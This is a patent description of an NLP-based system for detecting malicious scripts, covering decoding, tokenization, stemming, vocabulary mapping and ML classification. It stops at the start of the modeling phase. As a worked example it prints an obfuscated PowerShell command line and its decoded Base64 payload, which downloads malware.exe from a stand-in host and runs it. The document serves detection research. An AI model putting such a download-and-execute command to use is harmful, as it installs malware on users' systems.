System and method for detecting malicious scripts through natural language processing modeling

Description

FIELD

Embodiments of the disclosure relate to cybersecurity. More particularly, one embodiment of the disclosure relates to a system and corresponding method for using natural language processing (NLP) modeling to detect malicious scripts.

GENERAL BACKGROUND

Network devices provide useful and necessary services that assist individuals in business and in their everyday lives. Over the last few years, a growing number of cyberattacks are being conducted on all types of network devices. Some of these cyberattacks are orchestrated in an attempt to gain access to content stored on one or more network devices. Such access is for illicit (i.e., unauthorized) purposes, such as spying or other malicious or nefarious activities. Increasingly, shell scripts are becoming a vector for cyberattacks.

In general terms, a “shell” is an interface to the operating system (OS) kernel (and thus to OS services such as file management, process management, etc.), and may be implemented to operate as a command line interpreter. A “shell script” is a script (computer program) executed by the shell, where the script may include at least one command of the shell interface. While shell scripts are frequently used in legitimate computer operations (e.g., system administration, etc.), there is a growing tendency for malware authors to use shell scripts to mask their malicious intent (e.g., making such scripts appear to execute legitimate tasks). One reason for this growing use of scripts for carrying out cyberattacks centers around scripting flexibility, namely scripts may be coded to support a diverse group of tasks. Thus, it is difficult to discern a script directed to an illegitimate task from a script directed to a legitimate task. Moreover, given the diversity of scripts, it has been difficult to develop signatures to detect malicious scripts. Due of this combination of scripting flexibility and diversity, using shell scripts, malware authors are often able to evade detection.

Prior malware detection systems have been configured to detect malicious shell scripts based on manual, human-engineered signatures, which have been difficult to develop and maintain their effectiveness. In a short amount of time, the script signature may become prone to “false positive” (FP) and/or “false negative” (FN) determinations based on slight changes in the shell script language by the malware author. Also, manual generation of signatures is a slow, inefficient process that fails to adequately support the protection of network devices from an ever-changing threat landscape.

BRIEF DESCRIPTION OF THE DRAWINGS

Embodiments of the disclosure are illustrated by way of example and not by way of limitation in the figures of the accompanying drawings, in which like references indicate similar elements and in which:

FIG. 1 is a first exemplary embodiment of an architecture of an enhanced malware detection system deployed as a software agent operating within a network device.

FIG. 2 is a second exemplary embodiment of an architecture of the enhanced malware detection system deployed as logic within a cybersecurity system.

FIG. 3 is an exemplary embodiment of a Natural Language Processing (NLP) pipeline illustrating operations of the software agent of FIG. 1 or the cybersecurity logic of FIG. 2 based on a command line text input.

FIGS. 4A-4B are illustrative embodiments of a flowchart outlining the operations conducted by the enhanced malware detection system of FIGS. 1-2.

DETAILED DESCRIPTION
I. Overview

Natural-language processing is an area of computer science and artificial intelligence concerned with the interactions between computers and human (natural) languages, namely natural language processing is typically used to analyze human languages. Challenges in natural-language processing frequently involve speech recognition, natural-language understanding, and natural-language generation. Thus far, natural language processing has focused on the analysis of human languages, not computer language analysis.

For this embodiment of the disclosure, highly flexible scripts are analyzed for maliciousness using natural language processing (NLP). As used herein, a “script” may be broadly understood as any computer instructions, commands or other programs (“programming”) written either in (i) an interpreted scripting language (such as Perl, PowerShell, Python, JavaScript, and Tcl, to name a few) and run on a computer via an interpreter, or (ii) in a textual language (such as C++, C# Java, and Ruby, to name a few) so as to constitute source code that requires compiling to run on a computer. One type of script written in an interpreted language is a shell script, which may be made available to a network device by typing or otherwise entering commands into a command line interface or graphical user interface. Furthermore, the script may be created by malware (post-intrusion) into the endpoint or introduced by an external source such as via a web download or connection of an external storage device. Accordingly, “script” as used herein is intended to encompass the conventional use of that term as well as any other computer programming in human readable form so as to be susceptible to NLP. Where object code (sometimes called binary or executable code) is to be analyzed, that code will need to be subject to pre-processing (e.g., disassembling and decompiling) to produce the source code (i.e., script) version.

As described below, the text associated with each script under analysis (referred to as the “script text”) may undergo tokenization to produce natural (i.e., human) language samples. These natural language samples are referred to as analytic tokens, where an “analytic token” may be defined as an instance of a sequence of characters (i.e., letters, numbers, and/or symbols) that are grouped together as a useful semantic unit for NLP. Thereafter, the script text formed by a plurality of analytic tokens may undergo normalization, which produces normalized script text. Thereafter, a supervised learning model may be applied to the normalized script text in order to classify the script as malicious or benign.

As described below, the supervised learning model utilizing natural processing language functionality (generally referred to as a “NLP model”) may be provided as (i) a machine learning (ML) model of a scripting language utilized by the script and/or (ii) a deep neural network (e.g., recurrent neural network “RNN” or a convolution neural network “CNN”), which identifies text patterns for the scripting language that are probative of how the script should be classified. Depending on deployment, when ML model is applied, each analytic token or combination of multiple, neighboring analytic tokens (generally referred to as “model-adapted token”) is analyzed, using the ML model and a corpus of known malicious software (malware) and known non-malicious software (goodware) tokens, to determine a prediction score for the set of model-adapted tokens. The “prediction score” is a value that represents a likelihood of the set of model-adapted token being malicious (i.e., a level of maliciousness). As a result, based on prediction score, a determination may be made whether the script is malicious or benign.

Similarly, when the deep neural network is applied, each analytic token is analyzed, where the operations of the neural network are pre-trained (conditioned) using labeled training sets of tokens from malicious and/or benign labeled tokens in order to identify which analytic tokens are probative of how the script should be classified. Communicatively coupled to and functioning in concert with the neural network, a classifier, operating in accordance with a set of classification rules, receives an output from the neural network and determines a classification (malicious, benign) assigned to the set of analytic token forming the normalized script text.

More specifically, one embodiment of the disclosure is directed to an enhanced malware detection system configured to analyze scripts executing in an environment to determine if the scripts are malicious. Herein, according to this embodiment, the enhanced malware detection system (i) detects a newly active subscript; (ii) retrieves the script text forming at least part of the script, and (iii) processes the script text (i.e., a collection of words each formed by one or more characters) by performing at least tokenization and normalization operations on the script text.

During tokenization, the script text is segmented into prescribed amounts of text (referred to as “analytic tokens”). The prescribed amounts may be set in accordance with a grid search algorithm, for example. Additionally, any analytic tokens associated with decoded text recovered from an encoded portion of the script text may be tagged (e.g., use of a prefix) in order to signify portions of hidden script text that may warrant heightened scrutiny by the modeling logic (e.g., increased processing time, increased weighting, etc.). The tagging operation may be performed after a stemming operation, being part of the normalization, where the syntax of the script text under analysis is altered and text deemed insignificant in classification of the script is removed to provide a text format that is more easily processed by the modeling logic. The stemming operation may be conducted through a prefix tree to ensure distinctiveness between words being altered as the script text is converted into normalized script text.

Additionally, the enhanced malware detection system analyzes the normalized script text, in particular content associated with the plurality of analytic tokens after normalization, to determine if the script is malicious. For example, the analysis of the normalized script text may be conducted by a ML model which, when applied, selects a set of model-adapted tokens for processing (i.e., each model-adapted token being one or more normalized analytic tokens) and generates a prediction score based on the model-adapted tokens. The prediction score may be weighted and produced as an aggregate of scoring of the model-adapted tokens in determining a verdict for the script. For instance, if the prediction score exceeds a first specified score threshold, the enhanced malware detection system may classify the script as malicious. Similarly, if the prediction score falls below a second specified score threshold, the enhanced malware detection system may classify the script as benign. Lastly, in response to the prediction score falling between the first and second score thresholds, the enhanced malware detection system may classify the script as suspicious and may utilize other analyses in efforts to classify the script.

The NLP model, such as a ML model operating in accordance with NLP functionality, for example, is a statistical language model and provides a probability distribution over a sequence of one or more characters or words (e.g., sequence of multiple characters). The probability distribution is associated with a property, such as maliciousness. According to one embodiment, the NLP model is generated by analyzing a corpus of known malicious and benign scripts (generally referred to as “labeled scripts”) used in training a machine learning classifier to classify a set of model-adapted tokens as malicious or benign. Stated differently, the NLP model may be applied to the normalized script text, namely the plurality of analytic tokens after normalization, which generates a set of model-adapted tokens analyzed to determine a prediction score for each of the set of tokens.

Based on the prediction score (i.e., the likelihood of maliciousness) associated with the normalized script text, the level of maliciousness of the script may be learned. The classification may be determined by comparing the prediction score to one or more specified thresholds (e.g., a first threshold for malicious classification, a second threshold for benign classification, etc.). In response to the script being classified as malicious, the execution of the script may be terminated and/or an alert message (e.g., email message, text message, automated phone call, etc.) may be sent to an administrator. The alert message may be configured to identify the malicious script and provide a description that highlights the model-adapted token or tokens (or analytic token or tokens) demonstrative in the malicious classification and provides the rationale for the classification.

Herein, according to one embodiment of the disclosure, the enhanced malware detection system may be deployed as a module operating within a software agent implemented with a user operated endpoint. Running in the foreground or background, the agent is configured to identify malicious scripts during normal operation. The agent may include (i) a process monitoring component (hereinafter, “monitoring component”) and (ii) a decoding and analysis component (hereinafter, “DAC component”). The monitoring component is configured to determine when a script is in an active state (e.g., executed, request or awaiting execution, etc.). Upon identification, the script (or contents thereof) is provided to the DAC component. The DAC component is configured to process the script and generate a plurality of analytic tokens based on the script. The processing of the suspicious script may include the decoding of portions of the script that has been encoded to obfuscate and/or limit the ability of conventional malware detection systems to determine if the script is malicious. The DAC component is further configured to analyze the plurality of analytic tokens using the NLP model to effectively classify the script under analysis as malicious or benign.

In other embodiments, the functionality of the agent may be integrated into a cybersecurity system, namely a physical network device including a processor, a memory and a virtualized analyzer deployed within a virtualized subsystem that, upon execution, may control operability of one or more virtual machines (VMs) in which the script is tested. The virtualized analyzer may extract scripts from an object received as part of network traffic. The recovered scripts are provided to the one or more VMs to generate a verdict (i.e., malicious or benign). For instance, in some embodiments, the monitoring logic may identify an executing script and provide the identified scripts to remotely located analysis logic, which may reside in the proprietary network or as logic of a public cloud computing service or a private cloud computing service (e.g., private cloud, a virtual private cloud or a hybrid cloud).

II. Terminology

In the following description, certain terminology is used to describe various features of the invention. For example, each of the terms “logic,” “system,” “subsystem,” and “component” may be representative of hardware, firmware or software that is configured to perform one or more functions. As hardware, the term logic (or system or subsystem or component) may include circuitry having data processing and/or storage functionality. Examples of such circuitry may include, but are not limited or restricted to a hardware processor (e.g., microprocessor, one or more processor cores, a digital signal processor, a programmable gate array, a microcontroller, an application specific integrated circuit “ASIC”, etc.), a semiconductor memory, or combinatorial elements.

Additionally, or in the alternative, the logic (or system or subsystem or component) may include software such as one or more processes, one or more instances, Application Programming Interface(s) (API), subroutine(s), function(s), applet(s), servlet(s), routine(s), source code, object code, shared library/dynamic link library (dll), or even one or more instructions. This software may be stored in any type of a suitable non-transitory storage medium, or transitory storage medium (e.g., electrical, optical, acoustical or other form of propagated signals such as carrier waves, infrared signals, or digital signals). Examples of a non-transitory storage medium may include, but are not limited or restricted to a programmable circuit; non-persistent storage such as volatile memory (e.g., any type of random access memory “RAM”); or persistent storage such as non-volatile memory (e.g., read-only memory “ROM”, power-backed RAM, flash memory, phase-change memory, etc.), a solid-state drive, hard disk drive, an optical disc drive, or a portable memory device. As firmware, the logic (or component) may be stored in persistent storage.

The term “object” generally relates to information having a logical structure or organization that enables the object to be classified for purposes of malware analysis. The information may include an executable (e.g., an application, program, code segment, a script, dynamic link library “dll” or any file in a format that can be directly executed by a computer such as a file with an “.exe” extension, etc.), a non-executable (e.g., a file; any document such as a Portable Document Format “PDF” document; a word processing document such as Word® document; an electronic mail “email” message, web page, etc.), or simply a collection of related data (e.g., packets).

The term “computerized” generally represents that any corresponding operations are conducted by hardware in combination with software and/or firmware. The term “data store” generally refers to a data storage device such as the non-transitory storage medium described above, which provides non-persistent or persistent storage for the information (e.g., events). A “character” is broadly defined as a letter, a number, a punctuation, a symbol, or the like. A “sequence of characters” is two or more characters in succession and a “word” is a sequence of characters, which may be defined at both ends by delimiters (e.g., spaces, space, punctuation, etc.) while a “text” includes a collection of words.

According to one embodiment of the disclosure, the term “malware” may be broadly construed as any code, communication or activity that initiates or furthers a cyberattack. Malware may prompt or cause unauthorized, anomalous, unintended and/or unwanted behaviors or operations constituting a security compromise of information infrastructure. For instance, malware may correspond to a type of malicious computer code that, as an illustrative example, executes an exploit to take advantage of a vulnerability in a network, network device or software, to gain unauthorized access, harm or co-opt operations of the network, the network device or the software, or to misappropriate, modify or delete data. Alternatively, as another illustrative example, malware may correspond to information (e.g., executable code, script(s), data, command(s), etc.) that is designed to cause a network device to experience anomalous (unexpected or undesirable) behaviors. The anomalous behaviors may include a communication-based anomaly or an execution-based anomaly, which, for example, could (1) alter the functionality of a network device executing application software in an unauthorized or malicious manner; (2) alter the functionality of the network device executing that application software without any malicious intent; and/or (3) provide unwanted functionality which may be generally acceptable in another context.

The term “network device” may be construed as hardware and/or software with the capability of connecting to a network. The network may be a public network such as the Internet and/or a local (private) network such as an enterprise network, a wireless local area network (WLAN), a local area network (LAN), a wide area network (WAN), or the like. Examples of a network device may include, but are not limited or restricted to an endpoint (e.g., a laptop, a mobile phone, a tablet, a computer, a video console, a copier, etc.), a network appliance, a server, a router or other intermediary communication device, a firewall, etc.

The term “transmission medium” may be construed as a physical or logical communication path between two or more network devices or between components within a network device. For instance, as a physical communication path, wired and/or wireless interconnects in the form of electrical wiring, optical fiber, cable, bus trace, or a wireless channel using radio frequency (RF) or infrared (IR), may be used. A logical communication path may represent a communication path between two or more network devices or between components within a network device such as one or more Application Programming Interfaces (APIs).

Finally, the terms “or” and “and/or” as used herein are to be interpreted as inclusive or meaning any one or any combination. Therefore, “A, B or C” or “A, B and/or C” mean “any of the following: A; B; C; A and B; A and C; B and C; A, B and C.” An exception to this definition will occur only when a combination of elements, functions, steps or acts are in some way inherently mutually exclusive.

As this invention is susceptible to embodiments of many different forms, it is intended that the present disclosure is to be considered as an example of the principles of the invention and not intended to limit the invention to the specific embodiments shown and described.

III. General Architecture

Referring to FIG. 1, a first exemplary embodiment of an architecture of a network device 100 implemented with an enhanced malware detection system 110 deployed as a software agent operating within the network device 100 is shown. Herein, the network device 100 features a plurality of components 120, including a processor 170, a network interface 175, a non-transitory storage medium (e.g., memory) 180, and an administrative interface 185, which are communicatively coupled together via transmission medium 190. When deployed as a physical network device, the components 120 are at least partially encased in a housing 195 made entirely or partially of a rigid material (e.g., hardened plastic, metal, glass, composite, or any combination thereof). The housing 195 protects these components from environmental conditions. As a virtual device, however, the network device 100 constitutes a compilation of software performing functionality of the enhanced malware detection system 110 and/or functionality of the components 120 such as processor 170, the network interface 175 and the administrative interface 185 for example.

As shown in FIG. 1, according to one embodiment of the disclosure, the software agent 110, operating in the foreground or background, is configured to identify and process text 115 representing a collection of words (e.g., sequences of characters) forming an incoming script 112 (hereinafter, “script text 115”) to predict whether the script 112 is benign or malicious. For example, the script text 115 may include a sequence of multiple sequences of characters representing one or more commands that are to be executed by a shell (not shown), namely an interface to the OS kernel (not separately shown) of operating system 132. The agent 110 may include (i) a process monitoring component (hereinafter, “monitoring component”) 130 and (ii) a decoding and analysis component (hereinafter, “DAC component”) 135.

As described herein, the monitoring component 130 may be configured to detect a script 112 (e.g., shell script) in an active state (e.g., executed, awaiting or requesting execution, etc.). According to one embodiment of the disclosure, the monitoring component 130 detects the script 112 being placed into an active state by monitoring certain processes being executed by the processor 170 within the network device 100. The monitoring component 130 may monitor the processes directly. Alternatively, the monitoring component 130 may monitor the processes indirectly via process tracker logic 134, which is implemented as part of an operating system 132 of the network device 100 and configured to monitor processes involving scripts. Examples of different deployments of the process tracker logic 132 may include, but are not limited to a driver or a handler to monitor certain process calls (e.g., API calls, system call, etc.). Such operations may be performed in real-time.

Upon detecting the script 112, the monitoring component 130 obtains the script text 115 associated with the script 112 and provides the script text 115 to the DAC component 135. The DAC component 135 is configured to process the script text 115 and generate a set of tokens that are evaluated using a NLP-based modeling logic 160 maintained through supervised learning. Herein, the DAC component 135 includes normalization logic 140, the NLP-based modeling logic 160 and reporting logic 165.

Referring still in FIG. 1, the normalization logic 140 includes decode logic 142, named entity recognition logic 144, tokenization logic 146, stemmer logic 148, vocabulary mapping logic 150, and/or text reconstruction logic 152. Herein, according to one embodiment of the disclosure, the decode logic 142 is configured to recover at least a first text portion of the script text 115 that has been obfuscated (hidden) from analysis by conventional malware detection systems. From the script text 115 itself (e.g., a second portion of the script text 115), the decode logic 142 may be able to determine the encoding used to obfuscate the first (encoded) text portion and decode the first text portion accordingly to produce a non-encoded resultant text (hereinafter, the “decoded text”).

As further shown in FIG. 1, the named entity recognition logic 144 is configured to analyze the decoded text to at least determine whether a particular source or target of the script (e.g., domain name, host or email address, registry key, filename, etc.) is listed within the decoded text, and if so, utilize such information for subsequent analysis. For instance, a certain domain may identify a geographic location in which the script originated. The geographic location may provide additional evidence in determining whether the script is malicious or benign.

Furthermore, according to this embodiment, the tokenization logic 146 is configured to segment the decoded text of the script into smaller units (generally referred to as “analytic tokens”) for subsequent analysis by the NLP-based modeling logic 160. The size of the analytic tokens may be preset or selected based on the grid search technique, as described below. Furthermore, the analytic tokens associated with the first text portion of the script text 115 are tagged to identify such content was initially hidden. The encoding of the content may indicate that malware was attempting to evade detection. Such tagging may be accomplished by either (i) assigning a prefix to each analytic token being the decoded text from the first (encoded) text portion of the script text 115 or (ii) maintain a pointer or tag to each of these “hidden” analytic tokens. This tagging may be utilized by the NLP-based modeling logic 160 to conduct a higher scrutiny analysis of the tagged analytic tokens. However, depending on the deployment, the tagging of the analytic tokens may occur after operations by the stemmer logic 148.

The stemmer logic 148 is configured to alter the syntax of the decoded text (i.e., analytic tokens) to a different syntax. In particular, the stemmer logic 148 may substitute one or more words or characters within the decoded text for other words(s) or character(s), which places the decoded text into a simpler syntax. In some cases, the simpler syntax may result in a lesser number of characters than provided by the decoded text. For example, stemmer logic 148 can be implemented using a prefix tree. For example, the words “Execute” or “Encode” within the script may be stemmed by the prefix tree into “Ex” and “En”. The syntax change is conducted to improve efficiency in processing of the analytic tokens by the NLP-based modeling logic 160. Moreover, by placing the decoded text into the simpler syntax, the agent may mitigate an attempt by a malware author to circumvent malware detection by slightly changing text within a version of the script 112 (e.g., “Execute” may be illustrated 7! (seven factorial) different ways, such as “Execute,” “execute,” eXecute,” “EXecute,” etc.).

The vocabulary mapping logic 150 promotes words (e.g., a sequence of characters) into a vocabulary data store 155 that maintains words associated with different subscripts that have been determined to have a predetermined level of significance in the classification of scripts and/or tokens associated with the scripts. One technique for establishing a level of significance for a word (sequence of characters) is based on repetitive occurrence of a word within a script, where extremely frequent occurrences or rare occurrences of the word denotes lesser significance than words with intermediary frequency. An example of the technique includes term frequency-inverse document frequency (tf-idf).

Lastly, the text reconstruction logic 150 reconstructs the decoded text of the script 112 using only words in the vocabulary data store 155. The text reconstruction logic 150 produces normalized script text (see text 355 of FIG. 3) to be processed by the NLP-based modeling logic 160.

The NLP-based modeling logic 160 performs a statistical language modeling scheme that is applied to the normalized script text, namely the analytics tokens produced by the tokenization logic 146, to generate a set of tokens (hereinafter, “model-adapted tokens”) for correlation with tokens associated with a corpus of known malicious and/or known benign scripts. This correlation may be conducted by a classifier with a machine learning (ML) model (or a deep neural network) operating as the NLP model 162 for example. The NLP model 162 assigns a prediction score to the set of model-adapted tokens forming the normalized script text, which may be used to determine if the script 112 is malicious.

The reporting logic 165 is adapted to generate a description 166 that identifies the model-adapted token or tokens that were demonstrative in predicting the classification of the script 112 (i.e., benign or malicious) and represents the model-adapted token or tokens as the rationale for the assigned classification. The reporting logic 165 relates the description 166 with the stored model-adapted token(s) 167 identified in the description 166 for inclusion in an alert message 168, which is directed (e.g., transmitted) to an administrator responsible for the network device 100 and/or a network on which the network device 110 is connected.

Referring still to FIG. 1, the processor 170 includes one or more multi-purpose, programmable components that accept digital information as input, processes the digital information according to stored instructions, and provide results as output. One example of a processor may include an Intel® central processing unit (CPU) with an x86 instruction set architecture. Alternatively, the processor 170 may include another type of CPU, a digital signal processor (DSP), an Application Specific Integrated Circuit (ASIC), a field-programmable gate array (FPGA), or the like.

The processor 170 is communicatively coupled to the memory 180 via the transmission medium 190. According to one embodiment of the disclosure, the memory 180 is adapt to store (i) the monitoring component 130 (described above), (ii) the DAC component 135 (described above), and/or (ii) any portion thereof. The network interface 185 is a portal that allows an administrator, after credential exchange and authentication, to access and update logic stored within the memory 180 of the network device 110. For instance, the network interface 185 may include authentication logic (not shown) to authenticate an administrator requesting access to stored logic within the network device 110. Upon authentication, the administrator is able to modify (i) rules that control operability of the monitoring component 130, (ii) portions of the normalization logic 140 (e.g., add new decoder, change tokenization logic 146, change stemmer logic 148, or the like), and/or (iii) NLP model functionality.

Referring now to FIG. 2, an exemplary block diagram of a physical representation of a cybersecurity system 200 is shown. Similar to the architecture of the components included as part of the network device 100 of FIG. 1, the cybersecurity system 200 features a plurality of components 210, including a processor 220, a network interface 225, a memory 230, and an administrative interface 235, which are communicatively coupled together via a transmission medium 240. As shown, when deployed as a physical network device, the cybersecurity system 200 includes the components 210 at least partially encased in a housing 250. As a virtual device, however, the cybersecurity system 200 is deployed as logic, where some or all of the logic, provided as the components 210, is stored within the memory 240.

Herein, the processor 220 and an operating system (OS) 260 including the process tracker logic 134, which is maintained within the memory 230, operate as system resources for a virtualized subsystem 265, including one or more virtual machine instances 270 (e.g., a first VM). The first VM 270 is configured to analyze an incoming object 275. During processing of the object 275 within the VM 270 of the virtualized subsystem 265, the monitoring component 130 detects execution of the script 112 and the DAC component 135 performs the NLP processing of the script text 115 within the first VM 270 in a similar manner as described above.

Herein, the cybersecurity system 200 may be deployed on-premises (e.g., as an edge device for the local network, a network device with an interior coupling to the local network, etc.) to detect and analyze objects including scripts propagating into or through the local network. Alternatively, although not shown, the cybersecurity system 200 may be deployed as a cloud-based solution in which the script 112 is captured at or within the local network and submitted to a cloud-based cybersecurity system 200 to handle the analysis of the script 115, thereby leveraging deep neural networks for handling the NLP modeling, as described below.

IV. NLP Pipeline Operability

Referring to FIG. 3, an exemplary embodiment of a NLP pipeline 300 illustrating a sequence of operations performed by the enhanced malware detection system 110 is shown. According to this embodiment of the disclosure, the script text 115 may be command line text provided by the monitoring component 130 to the DAC component 135 or information received as input via a graphical user interface (GUI). As shown, the NLP pipeline 300 includes four (4) phases of operation; namely, (1) a data input phase 310 performed by the monitoring logic 130 of FIG. 1; (2) a normalization phase 320 performed by the normalization logic 140 of FIG. 1; (3) a modeling phase 360 performed by the NLP-based modeling logic 160 of FIGS. 1; and (4) a data output phase 380 performed by the reporting logic 165 of FIG. 1. Collectively, these phases are useful in identifying a cyberattack resulting from a user input rather than malware coming into the network as part of network traffic or an email message.

A. Data Input Phase

During the data input phase 310, the enhanced malware detection system 110 collects the incoming text associated with a script (i.e., script text 115). According to one embodiment of the disclosure, the script text 115 may be collected by either (i) monitoring active processes running a script and collecting the script text 115 during such monitoring or (ii) monitoring results collected by a process tracker logic being part of an operating system deployed within the network device 100 of FIG. 1 or the cybersecurity system 200 of FIG. 2. According to one embodiment of the disclosure, the monitoring operations conducted for collecting of the script text 115 may be performed concurrently (i.e., overlapping at least a portion in time) with the execution of the script 112. An illustrative representation of the script text 115 associated with the script 112 (e.g., Powershell), which is observed by the monitoring component 130, is shown as script representation (1) with an encoded portion italicized:

Script Representation (1): script text 305

- C:\\WINDOWS\\sysTEM32\\WInDOwspoWerSHElL\\V1.0\\POWERSHell.e xe\″\″POWersheLL.EXE-EXeCuTIONpolicY BypASS-nopROFILe-wiNDoWSTyle hIDden-encodEdComMaND IChuRVctT0JqRWN01FNZc3RFbS5OZVQud2VCQ0xJRU50KS5kb3dub E9BZEZpTGUoIB0gIGh0dHA6Ly93d3cuYmFkd2Vic2l0ZXZmLmNvbS9tYWx 3YXJlLmV4ZR0gICwgHSAkRU52OlRFTVBcb3V0dC5leGUdICApIDsgU3RB cnQgHSAkZW5WOnRFbXBcb3V0dC5leGUdIA==\

Upon collection, either the script text 115 or a portion of the script text 115 (hereinafter “script text 305”) is made available to the normalization logic 140. Herein, as shown, the script text 305 may be provided in the form of a command line text, which undergoes the normalization phase 320, resulting in the generation of normalized script text 355 for processing by the NLP model 365 or 370 during the NLP modeling phase 360.

B. Normalization Phase

The normalization phase 320 is conducted to (i) collect a portion of the script text 305, which includes collection of the non-encoded script text 315 and recovery of text that has been obfuscated through a prior encoding activity (hereinafter, “hidden script text 317”), and (iii) provide the normalized script text 355, filtered to remove text having little significance in the classification of the script 112, to the NLP modeling phase 360. Both the recovery of the hidden script text 317 and the generation of the normalized script text 355 increases the accuracy of the enhanced malware detection system 110 in classifying a detected script 112, namely reducing the number and/or rate of false positives (FPs) and/or false negatives (FNs) that may occur during analysis of the script text 305. Furthermore, the normalization phase 320 is conducted to establish a robust vocabulary data store (e.g., at 155 of FIG. 1)), expanded to include text (e.g., words, characters, etc.) having significant occurrences in the corpus or malicious scripts and/or benign scripts.

As shown, the normalization phase 320 includes the decode sub-phase 325, named entity recognition sub-phase 330, tokenization sub-phase 335, stemmer sub-phase 340, vocabulary construction sub-phase 345, and/or the text reconstruction sub-phase 350. The operations conducted during these sub-phases 325, 330, 335, 340, 345 and 350 are performed by the DAC component 135 represented in FIGS. 1-2, namely the decode logic 142, the named entity recognition logic 144, the tokenization logic 146, the stemmer logic 148, the vocabulary mapping logic 150, and the text reconstruction logic 152, respectively.

During the decode sub-phase 325, a first portion of the script text 305 (i.e., hidden script text 317), encoded to obfuscate a certain portion of the script 112, is decoded. More specifically, according to one embodiment of the disclosure, the encoding scheme utilized by the hidden script text 317 (e.g., Base64, Unicode Transformation Format “UTF”, etc.) may be determined from accessing a second (non-encoded) portion 315 of the script text 305, which is different from the hidden script text 317. For one embodiment of the disclosure, the second text portion 315 is mutually exclusive from the hidden script text 317. An illustrative representation of the decoded hidden script 317, being a Base64 decoded string with varying character and capitalization, may be represented by script representation (2) as shown below:

Script Representation (2): decoded hidden script 317

- nEW-OBjEct SYstEm.NeT.weBCLIENt).downlOAdFiLe(http://www.badwebsitevf.com/malware.exe, $ENv:TEMP\outt.exe); StArt $enV:tEmp\outt.exe

Based on this information, the hidden script text 317 is decoded to produce decoded text, which includes the decoded hidden script text 317 and the non-encoded portion of the script text 305 (collectively referred to as the “decoded script text 318”). An illustrative representation of the decoded text 318, shown below as script representation (3), is provided to the named entity recognition sub-phase 330 via path 328.

Script Representation (3): decoded script text 318

- C:\\WINDOWS sysTEM32\\WInDOwspoWerSHElL\†1.0\\POWERSHell.e xe\″\″POWersheLL.EXE-EXeCuTIONpolicY BypASS-nopROFILe-wiNDoWSTyle hIDden-encodEdComMaND nEW-OBjEct SYstEm.NeT.weBCLIENt).downlOAdFiLe(http://www.badwebsitevf.com/malware.exe, $ENv:TEMP\outt.exe); StArt $enV:tEmp\outt.exe\

As shown in FIG. 3, during the named entity recognition sub-phase 330, the decoded script text 318 is analyzed to determine whether a name of a particular entity, such as a particular file name (e.g., POWersheLL.EXE, malware.exe), a particular source (e.g., domain name such as “badwebsitevf.com,” host address, etc.) or a particular target of the script (e.g., registry key, temporary file, etc.) for example, is identified in the decoded script text 318. If so, the normalization logic 140 of FIG. 1 ensures that the name of the particular entity is maintained in the normalized script text 355 provided to the NLP modeling phase 360. As an illustrative example, a particular domain registry key may be targeted by ransomware, and thus, an attempted access to that registry key heightens the suspiciousness of the decoded script text 318. Likewise, a particular host address may identify a geographic location from which a number of cyberattacks have originated. Hence, the named entity recognition sub-phase 330 is used to assist in the NLP modeling phase 360 to improve accuracy in the resulting classification of the script 305 as malicious or benign.

During the tokenization sub-phase 335, provided via path 332, the decoded script text 318 is segmented into smaller sized units (i.e. the plurality of “analytic tokens”) to produce segmented text 337 for subsequent analysis during the NLP modeling phase 360. The size of the analytic tokens may be preset or selected based on grid search techniques. For instance, a series of thresholds for the TF-IDF weighting is defined (e.g., weights of 10%, 20%, . . . 90%), and search for the best parameter associated with the size of the analytic token that will yield the best ML prediction accuracy. Furthermore, for this embodiment of the disclosure, during the tokenization sub-phase 335, each of the analytic tokens forming the segmented text 337 and corresponding to the decoded hidden script text 317 is assigned a prefix (e.g., “PF_”). The prefix is provided to prioritize analysis of these tokens during the NLP modeling phase 360 as shown in script representation (4).

Script Representation (4): analytic tokens 337 with prefixes

- C:\\WINDOWS\\sysTEM32\\WInDOwspoWerSHElL\W1.0\\POWERSHell.e xe\″\″POWersheLL.EXE-EXeCuTIONpolicY BypASS-nopROFILe-wiNDoWSTyle hIDden-encodEdComMaND PF_nEW-OBjEct PF_SYstEm.NeT.weBCLIENt).downlOAdFiLe(PF_http://www.badwebsitevfcom/malware.exe, PF_$ENv:TEMP\outt.exe); PF_StArt $enV:tEmp\outt.exe\

In addition during the stemmer sub-phase 340, the segmented text 337 (provided via path 338) undergoes operations to simplify its syntax. More specifically, during the stemmer sub-phase 340, the syntax of the segmented text 337 may be simplified by at least substituting a sequence of characters (e.g., a text string) for any multiple string patterns that represent the same argument in order to provide a uniform segmented text 342 via path 343. For example, with respect to script representation (4), multiple arguments with deviations in capitalization and/or spelling (e.g., “EXeCuTIONpolicY” as shown above, “ExecutionPolicy,” etc.) are uniformly referenced as the character “e,” as shown below. This operations of the stemmer sub-phase 340 broadens the degree of correlation between arguments to avoid malware attackers circumventing malware detection by renaming certain arguments within the script text 305.

During the vocabulary construction sub-phase 345, a data store of significant text terms (i.e., selected characters or sequences of characters) are continuously updated, including storing certain wording from the uniform segmented text 342. Stated differently, language (analytic token) is “insignificant” where the text pattern (e.g., word) is commonplace within the text and offers little value in distinguishing the analytic tokens or is pf a low frequency or a single instance so that any change to the language can be performed to easily circumvent the NLP analysis. Hence, the operation of the vocabulary construction sub-phase 345 is to develop a vocabulary data store that retains significant language for script analysis, where the significant language may be updated in response to a training session of the ML models operating with the NLP modeling phase 360.

The normalized script text 355 is formed during the text reconstruction phase 350 in which portions of the decoded meta-information are removed or substituted with wording supplied by the vocabulary mapping logic 148. More specifically, the text reconstruction logic 150 reconstructs the uniform segmented text 352 using only text terms in the vocabulary data store, thereby producing a normalized script text 355 to be processed by the NLP model 162. More specifically, the uniform segmented text 352 is filtered to remove language that is insignificant. An illustrative representation of the normalized script text 355 is the following, where the resultant script representation is much shorter in character (word) size than the first script representation signifying that the resultant script representation has a better length and content for readily determining malware or benign content:

Script Representation (5): Normalized script text 355

- c windows system32 windowspowerv1.0 powershell.exe powershell.exe-e bypass-nop-w hidden-e PF_new-object PF_system.net.webclient PF_http PF_$env PF_temp PF_$env PF_temp

C. Modeling Phase

After formulation of the normalized script text 355, namely the plurality of analytic tokens, during the NLP modeling phase 360, a NLP model is applied to the normalized script text 355. During such application, depending on the type of machine learning operations being performed, a prediction score for the script is generated. The prediction score may be based, at least in part, on a collection of scores associated with a set of model-adapted tokens generated from the normalized script text 355 (e.g., based on the plurality of analytic tokens).

